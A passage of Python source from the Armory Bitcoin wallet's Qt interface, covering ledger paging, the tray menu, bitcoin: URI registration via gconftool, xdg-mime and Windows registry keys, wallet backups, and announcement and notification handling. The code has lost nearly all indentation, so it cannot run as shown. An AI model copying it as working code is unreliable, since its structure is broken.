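# Mix all three sources and whiten them through keyed hashing so any
# single weak source cannot bias the final key-generation entropy.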
allEntropy = ''.join([str(a) for a in [source1, source2, source3]])
return SecureBinaryData(HMAC256('Armory Entropy', allEntropy))
####################################################
def rescanNextLoad(self):
reply = QMessageBox.warning(self, tr('Queue Rescan?'), tr("""
The next time you restart Armory, it will rescan the blockchain
database, and reconstruct your wallet histories from scratch.
The rescan will take 10-60 minutes depending on your system.
<br><br>
Do you wish to force a rescan on the next Armory restart?"""), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescan.flag') )
####################################################
def rebuildNextLoad(self):
reply = QMessageBox.warning(self, tr('Queue Rebuild?'), tr("""
The next time you restart Armory, it will rebuild and rescan
the entire blockchain database. This operation can take between
30 minutes and 4 hours depending on your system speed.
<br><br>
Do you wish to force a rebuild on the next Armory restart?"""), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
####################################################
def loadFailedManyTimesFunc(self, nFail):
"""
For now, if the user is having trouble loading the blockchain, all
we do is delete mempool.bin (which is frequently corrupted but not
detected as such). However, we may expand this in the future, if
it's determined that more-complicated things are necessary.
"""
LOGERROR('%d attempts to load blockchain failed. Removing mempool.bin.' % nFail)
mempoolfile = os.path.join(ARMORY_HOME_DIR,'mempool.bin')
if os.path.exists(mempoolfile):
os.remove(mempoolfile)
else:
LOGERROR('File mempool.bin does not exist. Nothing deleted.')
####################################################
def menuSelectImportKey(self):
QMessageBox.information(self, 'Select Wallet', \
'You must import an address into a specific wallet. If '
'you do not want to import the key into any available wallet, '
'it is recommended you make a new wallet for this purpose.'
'<br><br>'
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window.'
'<br><br>'
'Keys cannot be imported into watching-only wallets, only full '
'wallets.', QMessageBox.Ok)
####################################################
def menuSelectSweepKey(self):
QMessageBox.information(self, 'Select Wallet', \
'You must select a wallet into which funds will be swept. '
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window to sweep to that wallet.'
'<br><br>'
'Keys cannot be swept into watching-only wallets, only full '
'wallets.', QMessageBox.Ok)
####################################################
def changeNumShow(self):
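# 'All' disables paging (width -1); any numeric option shows the window
# [currLedgMin, currLedgMin + width - 1].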
prefWidth = self.numShowOpts[self.comboNumShow.currentIndex()]
if prefWidth=='All':
self.currLedgMin = 1
self.currLedgMax = self.ledgerSize
self.currLedgWidth = -1
else:
self.currLedgMax = self.currLedgMin + prefWidth - 1
self.currLedgWidth = prefWidth
self.applyLedgerRange()
####################################################
def clickLedgUp(self):
self.currLedgMin -= self.currLedgWidth
self.currLedgMax -= self.currLedgWidth
self.applyLedgerRange()
####################################################
def clickLedgDn(self):
self.currLedgMin += self.currLedgWidth
self.currLedgMax += self.currLedgWidth
self.applyLedgerRange()
####################################################
def applyLedgerRange(self):
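# Clamp the requested window to [1, ledgerSize], then show the up/down
# buttons only when there are rows beyond the respective edge.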
if self.currLedgMin < 1:
toAdd = 1 - self.currLedgMin
self.currLedgMin += toAdd
self.currLedgMax += toAdd
if self.currLedgMax > self.ledgerSize:
toSub = self.currLedgMax - self.ledgerSize
self.currLedgMin -= toSub
self.currLedgMax -= toSub
self.currLedgMin = max(self.currLedgMin, 1)
self.btnLedgUp.setVisible(self.currLedgMin!=1)
self.btnLedgDn.setVisible(self.currLedgMax!=self.ledgerSize)
self.createCombinedLedger()
####################################################
def openSettings(self):
LOGDEBUG('openSettings')
dlgSettings = DlgSettings(self, self)
dlgSettings.exec_()
####################################################
def setupSystemTray(self):
LOGDEBUG('setupSystemTray')
# Creating a QSystemTray
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon( QIcon(self.iconfile) )
self.sysTray.setVisible(True)
self.sysTray.setToolTip('Armory' + (' [Testnet]' if USE_TESTNET else ''))
self.connect(self.sysTray, SIGNAL('messageClicked()'), self.bringArmoryToFront)
self.connect(self.sysTray, SIGNAL('activated(QSystemTrayIcon::ActivationReason)'), \
self.sysTrayActivated)
menu = QMenu(self)
def traySend():
self.bringArmoryToFront()
self.clickSendBitcoins()
def trayRecv():
self.bringArmoryToFront()
self.clickReceiveCoins()
actShowArmory = self.createAction('Show Armory', self.bringArmoryToFront)
actSendBtc = self.createAction('Send Bitcoins', traySend)
actRcvBtc = self.createAction('Receive Bitcoins', trayRecv)
actClose = self.createAction('Quit Armory', self.closeForReal)
# Create a short menu of options
menu.addAction(actShowArmory)
menu.addAction(actSendBtc)
menu.addAction(actRcvBtc)
menu.addSeparator()
menu.addAction(actClose)
self.sysTray.setContextMenu(menu)
self.notifyQueue = []
self.notifyBlockedUntil = 0
#############################################################################
@AllowAsync
def registerBitcoinWithFF(self):
#the 3 nodes needed to add to register bitcoin as a protocol in FF
rdfschemehandler = 'about=\"urn:scheme:handler:bitcoin\"'
rdfscheme = 'about=\"urn:scheme:bitcoin\"'
rdfexternalApp = 'about=\"urn:scheme:externalApplication:bitcoin\"'
#find mimeTypes.rdf file
home = os.getenv('HOME')
out,err = execAndWait('find %s -type f -name \"mimeTypes.rdf\"' % home)
for rdfs in out.split('\n'):
if rdfs:
try:
FFrdf = open(rdfs, 'r+')
except:
continue
ct = FFrdf.readlines()
rdfsch=-1
rdfsc=-1
rdfea=-1
i=0
#look for the nodes
for line in ct:
if rdfschemehandler in line:
rdfsch=i
elif rdfscheme in line:
rdfsc=i
elif rdfexternalApp in line:
rdfea=i
i+=1
#seek to end of file
FFrdf.seek(-11, 2)
i = 0
#add the missing nodes
if rdfsch == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:handler:bitcoin\"\n')
FFrdf.write(' NC:alwaysAsk=\"false\">\n')
FFrdf.write(' <NC:externalApplication RDF:resource=\"urn:scheme:externalApplication:bitcoin\"/>\n')
FFrdf.write(' <NC:possibleApplication RDF:resource=\"urn:handler:local:/usr/bin/xdg-open\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfsc == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:bitcoin\"\n')
FFrdf.write(' NC:value=\"bitcoin\">\n')
FFrdf.write(' <NC:handlerProp RDF:resource=\"urn:scheme:handler:bitcoin\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfea == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:externalApplication:bitcoin\"\n')
FFrdf.write(' NC:prettyName=\"xdg-open\"\n')
FFrdf.write(' NC:path=\"/usr/bin/xdg-open\" />\n')
i+=1
if i != 0:
FFrdf.write('</RDF:RDF>\n')
FFrdf.close()
#############################################################################
def setupUriRegistration(self, justDoIt=False):
"""
Setup Armory as the default application for handling bitcoin: links
"""
LOGINFO('setupUriRegistration')
if USE_TESTNET:
return
if OS_LINUX:
out,err = execAndWait('gconftool-2 --get /desktop/gnome/url-handlers/bitcoin/command')
out2,err = execAndWait('xdg-mime query default x-scheme-handler/bitcoin')
#check FF protocol association
#checkFF_thread = threading.Thread(target=self.registerBitcoinWithFF)
#checkFF_thread.start()
self.registerBitcoinWithFF(async=True)
def setAsDefault():
LOGINFO('Setting up Armory as default URI handler...')
execAndWait('gconftool-2 -t string -s /desktop/gnome/url-handlers/bitcoin/command "python /usr/lib/armory/ArmoryQt.py \"%s\""')
execAndWait('gconftool-2 -s /desktop/gnome/url-handlers/bitcoin/needs_terminal false -t bool')
execAndWait('gconftool-2 -t bool -s /desktop/gnome/url-handlers/bitcoin/enabled true')
execAndWait('xdg-mime default armory.desktop x-scheme-handler/bitcoin')
if ('no value' in out.lower() or 'no value' in err.lower()) and not 'armory.desktop' in out2.lower():
# Silently add Armory if it's never been set before
setAsDefault()
elif (not 'armory' in out.lower() or not 'armory.desktop' in out2.lower()) and not self.firstLoad:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
if not self.getSettingOrSetDefault('DNAA_DefaultApp', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, 'Default URL Handler', \
'Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?', 'Do not ask this question again')
if reply[0]==True:
setAsDefault()
if reply[1]==True:
self.writeSetting('DNAA_DefaultApp', True)
elif OS_WINDOWS:
# Check for existing registration (user first, then root, if necessary)
action = 'DoNothing'
modulepathname = '"'
if getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
app_path = os.path.join(app_dir, sys.executable)
elif __file__:
return #running from a .py script, not gonna register URI on Windows
#justDoIt = True
import ctypes
GetModuleFileNameW = ctypes.windll.kernel32.GetModuleFileNameW
GetModuleFileNameW.restype = ctypes.c_int
app_path = ctypes.create_string_buffer(1024)
rtlength = ctypes.c_int()
rtlength = GetModuleFileNameW(None, ctypes.byref(app_path), 1024)
passstr = str(app_path.raw)
modulepathname += unicode(passstr[0:(rtlength*2)], encoding='utf16') + u'" "%1"'
modulepathname = modulepathname.encode('utf8')
rootKey = 'bitcoin\\shell\\open\\command'
try:
userKey = 'Software\\Classes\\' + rootKey
registryKey = OpenKey(HKEY_CURRENT_USER, userKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
if val.lower()==modulepathname.lower():
LOGINFO('Armory already registered for current user. Done!')
return
else:
action = 'DoIt' #armory is registered, but to another path
else:
# Already set to something (at least created, which is enough)
action = 'AskUser'
except:
# No user-key set, check if root-key is set
try:
registryKey = OpenKey(HKEY_CLASSES_ROOT, rootKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
LOGINFO('Armory already registered at admin level. Done!')
return
else:
# Root key is set (or at least created, which is enough)
action = 'AskUser'
except:
action = 'DoIt'
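# By now 'action' is 'DoIt' (register immediately) or 'AskUser' (another
# handler owns bitcoin: links); the user settings below may override it.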
dontAsk = self.getSettingOrSetDefault('DNAA_DefaultApp', False)
dontAskDefault = self.getSettingOrSetDefault('AlwaysArmoryURI', False)
if justDoIt:
LOGINFO('URL-register: just doing it')
action = 'DoIt'
elif dontAsk and dontAskDefault:
LOGINFO('URL-register: user wants to do it by default')
action = 'DoIt'
elif action=='AskUser' and not self.firstLoad and not dontAsk:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, 'Default URL Handler', \
'Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?', 'Do not ask this question again')
if reply[1]==True:
LOGINFO('URL-register: do not ask again: always %s', str(reply[0]))
self.writeSetting('DNAA_DefaultApp', True)
self.writeSetting('AlwaysArmoryURI', reply[0])
if reply[0]==True:
action = 'DoIt'
else:
LOGINFO('User requested not to use Armory as URI handler')
return
# Finally, do it if we're supposed to!
LOGINFO('URL-register action: %s', action)
if action=='DoIt':
LOGINFO('Registering Armory for current user')
baseDir = os.path.dirname(unicode(passstr[0:(rtlength*2)], encoding='utf16'))
regKeys = []
regKeys.append(['Software\\Classes\\bitcoin', '', 'URL:bitcoin Protocol'])
regKeys.append(['Software\\Classes\\bitcoin', 'URL Protocol', ""])
regKeys.append(['Software\\Classes\\bitcoin\\shell', '', None])
regKeys.append(['Software\\Classes\\bitcoin\\shell\\open', '', None])
for key,name,val in regKeys:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
regKeysU = []
regKeysU.append(['Software\\Classes\\bitcoin\\shell\\open\\command', '', \
modulepathname])
regKeysU.append(['Software\\Classes\\bitcoin\\DefaultIcon', '', \
'"%s\\armory48x48.ico"' % baseDir])
for key,name,val in regKeysU:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
#hKey = ctypes.c_int(registryKey.handle)
#ctypes.windll.Advapi32.RegSetValueEx(hKey, None, 0, REG_SZ, val, (len(val)+1))
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
#############################################################################
def warnNewUSTXFormat(self):
if not self.getSettingOrSetDefault('DNAA_Version092Warn', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Warning, tr("Version Warning"), tr("""
         Since Armory version 0.92, the format for offline transaction
         operations has changed to accommodate multi-signature
         transactions. This format is <u>not</u> compatible with
         versions of Armory before 0.92.
         <br><br>
         To continue, the other system will need to be upgraded to
         version 0.92 or later. If you cannot upgrade the other
system, you will need to reinstall an older version of Armory
on this system."""), dnaaMsg='Do not show this warning again')
self.writeSetting('DNAA_Version092Warn', reply[1])
#############################################################################
def execOfflineTx(self):
self.warnNewUSTXFormat()
dlgSelect = DlgOfflineSelect(self, self)
if dlgSelect.exec_():
# If we got here, one of three buttons was clicked.
if dlgSelect.do_create:
DlgSendBitcoins(self.getSelectedWallet(), self, self,
onlyOfflineWallets=True).exec_()
elif dlgSelect.do_broadc:
DlgSignBroadcastOfflineTx(self,self).exec_()
#############################################################################
def sizeHint(self):
return QSize(1000, 650)
#############################################################################
def openToolsDlg(self):
QMessageBox.information(self, 'No Tools Yet!', \
'The developer tools are not available yet, but will be added '
'soon. Regardless, developer-mode still offers lots of '
'extra information and functionality that is not available in '
'Standard or Advanced mode.', QMessageBox.Ok)
#############################################################################
def execIntroDialog(self):
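      """
      Show the first-load intro dialog once, remembering the choice via the
      DNAA_IntroDialog setting, and launch the wallet wizard or importer if
      the user requested it.
      """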
if not self.getSettingOrSetDefault('DNAA_IntroDialog', False):
dlg = DlgIntroMessage(self, self)
result = dlg.exec_()
if dlg.chkDnaaIntroDlg.isChecked():
self.writeSetting('DNAA_IntroDialog', True)
if dlg.requestCreate:
self.startWalletWizard()
if dlg.requestImport:
self.execImportWallet()
#############################################################################
def makeWalletCopy(self, parent, wlt, copyType='Same', suffix='', changePass=False):
'''Create a digital backup of your wallet.'''
if changePass:
LOGERROR('Changing password is not implemented yet!')
raise NotImplementedError
# Set the file name.
if copyType.lower()=='pkcc':
fn = 'armory_%s.%s' % (wlt.uniqueIDB58, suffix)
else:
fn = 'armory_%s_%s.wallet' % (wlt.uniqueIDB58, suffix)
if wlt.watchingOnly and copyType.lower() != 'pkcc':
fn = 'armory_%s_%s_WatchOnly.wallet' % (wlt.uniqueIDB58, suffix)
savePath = unicode(self.getFileSave(defaultFilename=fn,
ffilter=[tr('Root Pubkey Text Files (*.rootpubkey)')]))
if not len(savePath)>0:
return False
# Create the file based on the type you want.
if copyType.lower()=='same':
wlt.writeFreshWalletFile(savePath)
elif copyType.lower()=='decrypt':
if wlt.useEncryption:
dlg = DlgUnlockWallet(wlt, parent, self, 'Unlock Private Keys')
if not dlg.exec_():
return False
# Wallet should now be unlocked
wlt.makeUnencryptedWalletCopy(savePath)
elif copyType.lower()=='encrypt':
newPassphrase=None
if not wlt.useEncryption:
dlgCrypt = DlgChangePassphrase(parent, self, not wlt.useEncryption)
if not dlgCrypt.exec_():
               QMessageBox.information(parent, tr('Aborted'), tr("""
                  No passphrase was selected for the encrypted backup.
                  No backup was created"""), QMessageBox.Ok)
               return False
            newPassphrase = SecureBinaryData(str(dlgCrypt.edtPasswd1.text()))
wlt.makeEncryptedWalletCopy(savePath, newPassphrase)
elif copyType.lower() == 'pkcc':
wlt.writePKCCFile(savePath)
else:
LOGERROR('Invalid "copyType" supplied to makeWalletCopy: %s', copyType)
return False
QMessageBox.information(parent, tr('Backup Complete'), tr("""
Your wallet was successfully backed up to the following
location:<br><br>%s""") % savePath, QMessageBox.Ok)
return True
#############################################################################
def createAction(self, txt, slot, isCheckable=False, \
ttip=None, iconpath=None, shortcut=None):
"""
Modeled from the "Rapid GUI Programming with Python and Qt" book, page 174
"""
icon = QIcon()
if iconpath:
icon = QIcon(iconpath)
theAction = QAction(icon, txt, self)
if isCheckable:
theAction.setCheckable(True)
self.connect(theAction, SIGNAL('toggled(bool)'), slot)
else:
self.connect(theAction, SIGNAL('triggered()'), slot)
if ttip:
theAction.setToolTip(ttip)
theAction.setStatusTip(ttip)
if shortcut:
theAction.setShortcut(shortcut)
return theAction
#############################################################################
def setUserMode(self, mode):
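      """
      Persist the new usermode (Standard/Advanced/Expert) to the settings
      file and remind the user that a restart may be needed for it to fully
      take effect.
      """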
LOGINFO('Changing usermode:')
LOGINFO(' From: %s', self.settings.get('User_Mode'))
self.usermode = mode
if mode==USERMODE.Standard:
self.writeSetting('User_Mode', 'Standard')
if mode==USERMODE.Advanced:
self.writeSetting('User_Mode', 'Advanced')
if mode==USERMODE.Expert:
self.writeSetting('User_Mode', 'Expert')
LOGINFO(' To: %s', self.settings.get('User_Mode'))
if not self.firstModeSwitch:
QMessageBox.information(self,'Restart Armory', \
'You may have to restart Armory for all aspects of '
'the new usermode to go into effect.', QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def getPreferredDateFormat(self):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
globalDefault = binary_to_hex(DEFAULT_DATE_FORMAT)
fmt = self.getSettingOrSetDefault('DateFormat', globalDefault)
return hex_to_binary(str(fmt)) # short hex strings could look like int()
#############################################################################
def setPreferredDateFormat(self, fmtStr):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
try:
unixTimeToFormatStr(1000000000, fmtStr)
except:
QMessageBox.warning(self, 'Invalid Date Format', \
'The date format you specified was not valid. Please re-enter '
'it using only the strftime symbols shown in the help text.', \
QMessageBox.Ok)
return False
self.writeSetting('DateFormat', binary_to_hex(fmtStr))
return True
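   # Illustrative sketch of the hex round-trip used by the two methods above:
   #    binary_to_hex('%Y-%b-%d') == '25592d25622d2564'
   # and hex_to_binary() recovers the original strftime string, so special
   # symbols never collide with the SettingsFile format.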
#############################################################################
def setupAnnouncementFetcher(self):
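      """
      Configure and start the AnnounceDataFetcher: honor the user/CLI flags
      that disable stats reporting or announce checking entirely, and rotate
      the anonymous 'MonthlyID' used to de-duplicate statistics reports.
      """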
# Decide if disable OS/version reporting sent with announce fetches
skipStats1 = self.getSettingOrSetDefault('SkipStatsReport', False)
skipStats2 = CLI_OPTIONS.skipStatsReport
self.skipStatsReport = skipStats1 or skipStats2
# This determines if we should disable all of it
skipChk1 = self.getSettingOrSetDefault('SkipAnnounceCheck', False)
skipChk2 = CLI_OPTIONS.skipAnnounceCheck
skipChk3 = CLI_OPTIONS.offline and not CLI_OPTIONS.testAnnounceCode
skipChk4 = CLI_OPTIONS.useTorSettings
skipChk5 = self.getSettingOrSetDefault('UseTorSettings', False)
self.skipAnnounceCheck = \
skipChk1 or skipChk2 or skipChk3 or skipChk4 or skipChk5
url1 = ANNOUNCE_URL
url2 = ANNOUNCE_URL_BACKUP
fetchPath = os.path.join(ARMORY_HOME_DIR, 'atisignedannounce')
if self.announceFetcher is None:
# We keep an ID in the settings file that can be used by ATI's
# statistics aggregator to remove duplicate reports. We store
# the month&year that the ID was generated, so that we can change
# it every month for privacy reasons
idData = self.getSettingOrSetDefault('MonthlyID', '0000_00000000')
storedYM,currID = idData.split('_')
monthyear = unixTimeToFormatStr(RightNow(), '%m%y')
if not storedYM == monthyear:
currID = SecureBinaryData().GenerateRandom(4).toHexStr()
self.settings.set('MonthlyID', '%s_%s' % (monthyear, currID))
self.announceFetcher = AnnounceDataFetcher(url1, url2, fetchPath, currID)
self.announceFetcher.setStatsDisable(self.skipStatsReport)
self.announceFetcher.setFullyDisabled(self.skipAnnounceCheck)
self.announceFetcher.start()
# Set last-updated vals to zero to force processing at startup
         for fid in ['changelog','downloads','notify','bootstrap']:
self.lastAnnounceUpdate[fid] = 0
# If we recently updated the settings to enable or disable checking...
if not self.announceFetcher.isRunning() and not self.skipAnnounceCheck:
self.announceFetcher.setFullyDisabled(False)
self.announceFetcher.setFetchInterval(DEFAULT_FETCH_INTERVAL)
self.announceFetcher.start()
elif self.announceFetcher.isRunning() and self.skipAnnounceCheck:
self.announceFetcher.setFullyDisabled(True)
self.announceFetcher.shutdown()
#############################################################################
def processAnnounceData(self, forceCheck=False, forceWait=5):
adf = self.announceFetcher
# The ADF always fetches everything all the time. If forced, do the
# regular fetch first, then examine the individual files without forcing
if forceCheck:
adf.fetchRightNow(forceWait)
# Check each of the individual files for recent modifications
idFuncPairs = [
['announce', self.updateAnnounceTab],
['changelog', self.processChangelog],
['downloads', self.processDownloads],
['notify', self.processNotifications],
['bootstrap', self.processBootstrap] ]
# If modified recently
for fid,func in idFuncPairs:
if not fid in self.lastAnnounceUpdate or \
adf.getFileModTime(fid) > self.lastAnnounceUpdate[fid]:
self.lastAnnounceUpdate[fid] = RightNow()
fileText = adf.getAnnounceFile(fid)
func(fileText)
#############################################################################
def processAlerts(self):
# display to the user any alerts that came in through the bitcoin
# network
if self.NetworkingFactory == None:
return
factory = self.NetworkingFactory
armoryClient = factory.getProto()
if armoryClient is None:
return
alerts = armoryClient.alerts
try:
peerInfo = armoryClient.peerInfo
except:
LOGERROR("failed to process alerts from bitcoind")
return
for id, alert in alerts.items():
if self.ignoreAlerts.get(id):
continue
if time.time() > alert.expiration:
continue
if peerInfo["version"] < alert.minVersion \
or peerInfo["version"] > alert.maxVersion:
continue
if peerInfo["subver"] not in alert.subVerSet:
continue
title = "Bitcoin alert %s" % alert.uniqueID
alert_str = "%s<br>%s<br>%s<br>" % (alert.statusBar, alert.comment, alert.reserved)
msg = "This alert has been received from the bitcoin network:<p>" + \
alert_str + \
"</p>Please visit <a href='http://www.bitcoin.org/en/alerts'>http://www.bitcoin.org/en/alerts</a> for more information.<br>"
reply, self.ignoreAlerts[id] = MsgBoxWithDNAA(
self, self, MSGBOX.Warning, title, msg,
'Do not show me this notification again', yesStr='OK')
self.writeSetting('IgnoreAlerts', ",".join([str(i) for i in self.ignoreAlerts.keys()]))
#############################################################################
def processChangelog(self, txt):
try:
clp = changelogParser()
self.changelog = clp.parseChangelogText(txt)
except:
# Don't crash on an error, but do log what happened
LOGEXCEPT('Failed to parse changelog data')
#############################################################################
def processDownloads(self, txt):
try:
dlp = downloadLinkParser()
self.downloadLinks = dlp.parseDownloadList(txt)
if self.downloadLinks is None:
return
thisVer = getVersionInt(BTCARMORY_VERSION)
# Check ARMORY versions
if not 'Armory' in self.downloadLinks:
LOGWARN('No Armory links in the downloads list')
else:
maxVer = 0
self.versionNotification = {}
for verStr,vermap in self.downloadLinks['Armory'].iteritems():
dlVer = getVersionInt(readVersionString(verStr))
if dlVer > maxVer:
maxVer = dlVer
self.armoryVersions[1] = verStr
if thisVer >= maxVer:
continue
shortDescr = tr('Armory version %s is now available!') % verStr
notifyID = binary_to_hex(hash256(shortDescr)[:4])
self.versionNotification['UNIQUEID'] = notifyID
self.versionNotification['VERSION'] = '0'
self.versionNotification['STARTTIME'] = '0'
self.versionNotification['EXPIRES'] = '%d' % long(UINT64_MAX)
self.versionNotification['CANCELID'] = '[]'
self.versionNotification['MINVERSION'] = '*'
self.versionNotification['MAXVERSION'] = '<%s' % verStr
self.versionNotification['PRIORITY'] = '3072'
self.versionNotification['ALERTTYPE'] = 'Upgrade'
self.versionNotification['NOTIFYSEND'] = 'False'
self.versionNotification['NOTIFYRECV'] = 'False'
self.versionNotification['SHORTDESCR'] = shortDescr
self.versionNotification['LONGDESCR'] = \
self.getVersionNotifyLongDescr(verStr).replace('\n','<br>')
if 'ArmoryTesting' in self.downloadLinks:
for verStr,vermap in self.downloadLinks['ArmoryTesting'].iteritems():
dlVer = getVersionInt(readVersionString(verStr))
if dlVer > maxVer:
maxVer = dlVer
self.armoryVersions[1] = verStr
if thisVer >= maxVer:
continue
shortDescr = tr('Armory Testing version %s is now available!') % verStr
notifyID = binary_to_hex(hash256(shortDescr)[:4])
self.versionNotification['UNIQUEID'] = notifyID
self.versionNotification['VERSION'] = '0'
self.versionNotification['STARTTIME'] = '0'
self.versionNotification['EXPIRES'] = '%d' % long(UINT64_MAX)
self.versionNotification['CANCELID'] = '[]'
self.versionNotification['MINVERSION'] = '*'
self.versionNotification['MAXVERSION'] = '<%s' % verStr
self.versionNotification['PRIORITY'] = '1024'
self.versionNotification['ALERTTYPE'] = 'upgrade-testing'
self.versionNotification['NOTIFYSEND'] = 'False'
self.versionNotification['NOTIFYRECV'] = 'False'
self.versionNotification['SHORTDESCR'] = shortDescr
self.versionNotification['LONGDESCR'] = \
self.getVersionNotifyLongDescr(verStr, True).replace('\n','<br>')
# For Satoshi updates, we don't trigger any notifications like we
# do for Armory above -- we will release a proper announcement if
         # necessary. But we do want to record the latest available version.
if not 'Satoshi' in self.downloadLinks:
LOGWARN('No Satoshi links in the downloads list')
else:
try:
maxVer = 0
for verStr,vermap in self.downloadLinks['Satoshi'].iteritems():
dlVer = getVersionInt(readVersionString(verStr))
if dlVer > maxVer:
maxVer = dlVer
self.satoshiVersions[1] = verStr
if not self.NetworkingFactory:
return
# This is to detect the running versions of Bitcoin-Qt/bitcoind
if self.NetworkingFactory.getProto():
thisVerStr = self.NetworkingFactory.getProto().peerInfo['subver']
thisVerStr = thisVerStr.strip('/').split(':')[-1]
if sum([0 if c in '0123456789.' else 1 for c in thisVerStr]) > 0:
return
self.satoshiVersions[0] = thisVerStr
else:
return
except:
pass
except:
# Don't crash on an error, but do log what happened
LOGEXCEPT('Failed to parse download link data')
#############################################################################
def getVersionNotifyLongDescr(self, verStr, testing=False):
shortOS = None
if OS_WINDOWS:
shortOS = 'windows'
elif OS_LINUX:
shortOS = 'ubuntu'
elif OS_MACOSX:
shortOS = 'mac'
webURL = 'https://bitcoinarmory.com/download/'
if shortOS is not None:
webURL += '#' + shortOS
if testing:
return tr("""
A new testing version of Armory is out. You can upgrade to version
%(ver)s through our secure downloader inside Armory (link at the bottom
of this notification window).
""") % { 'ver' : verStr}
return tr("""
Your version of Armory is now outdated. Please upgrade to version
%(ver)s through our secure downloader inside Armory (link at the bottom
of this notification window). Alternatively, you can get the new
version from our website downloads page at:
<br><br>
<a href="%(url)s">%(url)s</a> """) % {'ver' : verStr, 'url' : webURL}
#############################################################################
def processBootstrap(self, binFile):
# Nothing to process, actually. We'll grab the bootstrap from its
# current location, if needed
pass
#############################################################################
def notificationIsRelevant(self, notifyID, notifyMap):
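      """
      Return True only if the notification passes all filters: minimum
      priority, upgrade-notify preference, do-not-show-again list, start and
      expiration times, and the MINVERSION/MAXVERSION bounds (where '>' and
      '<' prefixes mark exclusive bounds).

      Illustrative sketch (values made up): a notifyMap such as
         {'PRIORITY': '3072', 'ALERTTYPE': 'Upgrade', 'STARTTIME': '0',
          'EXPIRES': '9999999999', 'MINVERSION': '*', 'MAXVERSION': '<0.93'}
      would be relevant to any Armory below 0.93, unless upgrade
      notifications are disabled.
      """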
currTime = RightNow()
thisVerInt = getVersionInt(BTCARMORY_VERSION)
# Ignore transactions below the requested priority
minPriority = self.getSettingOrSetDefault('NotifyMinPriority', 2048)
if int(notifyMap['PRIORITY']) < minPriority:
return False
# Ignore version upgrade notifications if disabled in the settings
if 'upgrade' in notifyMap['ALERTTYPE'].lower() and \
self.getSettingOrSetDefault('DisableUpgradeNotify', False):
return False
if notifyID in self.notifyIgnoreShort:
return False
if notifyMap['STARTTIME'].isdigit():
if currTime < long(notifyMap['STARTTIME']):
return False
if notifyMap['EXPIRES'].isdigit():
if currTime > long(notifyMap['EXPIRES']):
return False
try:
minVerStr = notifyMap['MINVERSION']
minExclude = minVerStr.startswith('>')
minVerStr = minVerStr[1:] if minExclude else minVerStr
minVerInt = getVersionInt(readVersionString(minVerStr))
minVerInt += 1 if minExclude else 0
if thisVerInt < minVerInt:
return False
except:
pass
try:
maxVerStr = notifyMap['MAXVERSION']
maxExclude = maxVerStr.startswith('<')
maxVerStr = maxVerStr[1:] if maxExclude else maxVerStr
maxVerInt = getVersionInt(readVersionString(maxVerStr))
maxVerInt -= 1 if maxExclude else 0
if thisVerInt > maxVerInt:
return False
except:
pass
return True
#############################################################################
def processNotifications(self, txt):
# Keep in mind this will always be run on startup with a blank slate, as
# well as every 30 min while Armory is running. All notifications are
# "new" on startup (though we will allow the user to do-not-show-again
# and store the notification ID in the settings file).
      try:
         np = notificationParser()
         currNotificationList = np.parseNotificationText(txt)
      except:
         # Don't crash on an error, but do log what happened
         LOGEXCEPT('Failed to parse notifications')
         currNotificationList = None
      if currNotificationList is None:
         currNotificationList = {}
      # If we have a new-version notification, it's not ignored, and such
      # notifications are not disabled, add it to the list
vnotify = self.versionNotification
if vnotify and 'UNIQUEID' in vnotify:
currNotificationList[vnotify['UNIQUEID']] = deepcopy(vnotify)
# Create a copy of almost all the notifications we have.
      # All notifications >= 2048, unless they've explicitly allowed testing
# notifications. This will be shown on the "Announcements" tab.
self.almostFullNotificationList = {}
currMin = self.getSettingOrSetDefault('NotifyMinPriority', \
DEFAULT_MIN_PRIORITY)
minmin = min(currMin, DEFAULT_MIN_PRIORITY)
for nid,valmap in currNotificationList.iteritems():
if int(valmap['PRIORITY']) >= minmin:
self.almostFullNotificationList[nid] = deepcopy(valmap)
tabPriority = 0
self.maxPriorityID = None
# Check for new notifications
addedNotifyIDs = set()
irrelevantIDs = set()
for nid,valmap in currNotificationList.iteritems():
if not self.notificationIsRelevant(nid, valmap):
# Can't remove while iterating over the map
irrelevantIDs.add(nid)
self.notifyIgnoreShort.add(nid)
continue
if valmap['PRIORITY'].isdigit():
if int(valmap['PRIORITY']) > tabPriority:
tabPriority = int(valmap['PRIORITY'])
self.maxPriorityID = nid
if not nid in self.almostFullNotificationList:
